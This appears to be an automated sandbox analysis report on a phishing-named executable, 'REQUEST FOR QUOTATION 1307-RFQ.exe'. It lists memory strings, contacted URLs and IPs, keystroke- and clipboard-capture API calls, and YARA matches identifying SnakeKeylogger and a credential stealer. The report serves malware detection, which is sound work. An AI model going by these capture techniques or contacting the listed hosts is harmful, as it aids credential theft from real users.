              Source: armsvc.exe, 00000001.00000003.2047123582.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2046894562.0000000000A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: Acrobat.exe.1.drString found in binary or memory: https://crbug.com/820996
              Source: Acrobat.exe.1.drString found in binary or memory: https://crbug.com/820996LaunchElevatedProcessdisable-best-effort-tasksdisable-breakpaddisable-featur
              Source: armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834519561.0000000002060000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821644148.0000000002060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
              Source: notification_click_helper.exe.1.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: notification_click_helper.exe.1.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834519561.0000000002060000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821644148.0000000002060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
              Source: armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189=4
              Source: AutoIt3Help.exe.1.drString found in binary or memory: https://www.autoitscript.com/site/autoit/8
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: VSSVC.exe.1.drBinary or memory string: Key with path %p\%s not foundRecursiveDeleteKeySHDeleteKey(%p,%s)CVssCoordinator::QueryCORQRYCbase\stor\vss\modules\coord\src\query.cxxParameters: QueriedObjectId = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, eQueriedObjectType = %d, eReturnedObjectsType = %d, ppEnum = %pInvalid QueriedObjectIdInvalid eQueriedObjectTypeInvalid eReturnedObjectsTypeNULL ppEnumMemory allocation error.Error calling Query(). [0x%08lx]Cannot create enumerator instance. [0x%08lx]CVssAdmin::QueryProvidersParameters: ppEnum = %pCVssSnasphotSetIdObserver::CVssSnasphotSetIdObserverCVssSnasphotSetIdObserver::~CVssSnasphotSetIdObserverCVssSnasphotSetIdObserver::StartRecordingCVssSnasphotSetIdObserver::StopRecordingStartRecording was not called successfullyCVssSnasphotSetIdObserver::IsRecordedCVssSnasphotSetIdObserver::BroadcastSSIDCVssSnasphotSetIdObserver::RecordSSIDCVssDLList<class CVssSnasphotSetIdObserver *>::AddVssBuildEnumInterfaceINCENUMHbase\stor\vss\inc\enum.hxxCannot initialize enumerator instance. [0x%08lx]Error querying the <IEnumInterface> interface with GUID {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}. hr = 0x%08lx

              System Summary

              barindex
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_669e35ba-d
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_fb947638-4
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d1b4f61d-7
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_82c19f2d-0
              Source: initial sampleStatic PE information: Filename: REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\713f49886881eab5.binJump to behavior
              Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0040E6A00_2_0040E6A0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042D9750_2_0042D975
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0040FCE00_2_0040FCE0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004221C50_2_004221C5
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004362D20_2_004362D2
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004803DA0_2_004803DA
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0043242E0_2_0043242E
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004225FA0_2_004225FA
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0045E6160_2_0045E616
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004166E10_2_004166E1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0043878F0_2_0043878F
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004368440_2_00436844
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004808570_2_00480857
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004188080_2_00418808
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004688890_2_00468889
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042CB210_2_0042CB21
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004ECCC80_2_004ECCC8
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00436DB60_2_00436DB6
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00416F9E0_2_00416F9E
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004130300_2_00413030
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042F1D90_2_0042F1D9
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004231870_2_00423187
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004012870_2_00401287
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004214840_2_00421484
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004155200_2_00415520
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004276960_2_00427696
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004157600_2_00415760
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004219780_2_00421978
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00439AB50_2_00439AB5
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00487DDB0_2_00487DDB
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00421D900_2_00421D90
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042BDA60_2_0042BDA6
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0040DF000_2_0040DF00
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00413FE00_2_00413FE0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B200D90_2_00B200D9
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE6EAF0_2_00AE6EAF
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE51EE0_2_00AE51EE
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B1D5800_2_00B1D580
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B137800_2_00B13780
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B1C7F00_2_00B1C7F0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B239A30_2_00B239A3
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B159800_2_00B15980
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE7B710_2_00AE7B71
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE7F800_2_00AE7F80
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00C936680_2_00C93668
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B43282_2_028B4328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B27B92_2_028B27B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B8DA02_2_028B8DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B59682_2_028B5968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B5F902_2_028B5F90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_028B2DD12_2_028B2DD1
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009BA8107_2_009BA810
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_00997C007_2_00997C00
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009979F07_2_009979F0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009C2D407_2_009C2D40
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009BEEB07_2_009BEEB0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009B92A07_2_009B92A0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009B93B07_2_009B93B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01ED79F08_2_01ED79F0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01F02D408_2_01F02D40
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01ED7C008_2_01ED7C00
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01EFA8108_2_01EFA810
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01EF93B08_2_01EF93B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01EF92A08_2_01EF92A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01EFEEB08_2_01EFEEB0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00BAA81010_2_00BAA810
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00B87C0010_2_00B87C00
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00B879F010_2_00B879F0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00BB2D4010_2_00BB2D40
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00BAEEB010_2_00BAEEB0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00BA92A010_2_00BA92A0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00BA93B010_2_00BA93B0
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_00956EAF11_2_00956EAF
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_0098598011_2_00985980
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_009939A311_2_009939A3
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_009551EE11_2_009551EE
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_0098D58011_2_0098D580
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_00957F8011_2_00957F80
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_0098378011_2_00983780
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_0098C7F011_2_0098C7F0
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_0098929011_2_00989290
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_00987B8011_2_00987B80
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_0056A81015_2_0056A810
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_00547C0015_2_00547C00
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_00572D4015_2_00572D40
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_005479F015_2_005479F0
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_0056EEB015_2_0056EEB0
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_005692A015_2_005692A0
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_005693B015_2_005693B0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D3A81017_2_00D3A810
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D17C0017_2_00D17C00
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D179F017_2_00D179F0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D42D4017_2_00D42D40
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D3EEB017_2_00D3EEB0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D392A017_2_00D392A0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D393B017_2_00D393B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: String function: 00407DE1 appears 35 times
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: String function: 00428900 appears 42 times
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: String function: 00420AE3 appears 70 times
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
              Source: elevation_service.exe0.1.drStatic PE information: Number of sections : 12 > 10
              Source: msedge_proxy.exe.1.drStatic PE information: Number of sections : 12 > 10
              Source: setup.exe.1.drStatic PE information: Number of sections : 13 > 10
              Source: elevation_service.exe.1.drStatic PE information: Number of sections : 12 > 10
              Source: msedgewebview2.exe.1.drStatic PE information: Number of sections : 14 > 10
              Source: firefox.exe.1.drStatic PE information: Number of sections : 11 > 10
              Source: identity_helper.exe.1.drStatic PE information: Number of sections : 12 > 10
              Source: ie_to_edge_stub.exe.1.drStatic PE information: Number of sections : 11 > 10
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1670504566.000000000435D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1670987417.00000000041B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1661421191.0000000003E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1665050092.0000000003E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs REQUEST FOR QUOTATION 1307-RFQ.exe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
